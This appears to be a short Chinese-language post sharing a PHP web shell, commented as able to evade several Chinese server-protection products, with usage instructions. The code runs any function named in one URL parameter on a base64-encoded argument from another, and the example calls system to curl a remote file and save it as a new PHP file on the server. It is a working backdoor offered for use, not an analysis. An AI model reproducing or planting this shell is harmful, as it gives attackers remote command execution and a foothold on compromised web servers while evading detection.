作者:
<?php //过云盾、D盾各种盾shell $id = $_GET['id']; //debug echo $catid = isset($_GET['catid'])?base64_decode($_GET['catid']):''; $s = ''; foreach(array($id) as $v){ $s.=$v; } ob_start($s); if($catid){ echo $catid; } ob_end_flush(); ?>
用方法
参数 id : 需要执行的函数
参数catid : 函数的参数(需要用base_64encode函数转一下)
例如:
http://www.php0.net/test.php?id=system&catid=Y3VybCBodHRwOi8vbG9jYWxob3N0L20udHh0ID4yLnBocA==
则调用system函数,而参数内容为: curl http://localhost/m.txt >2.php
读取远程的代码,并写入本地。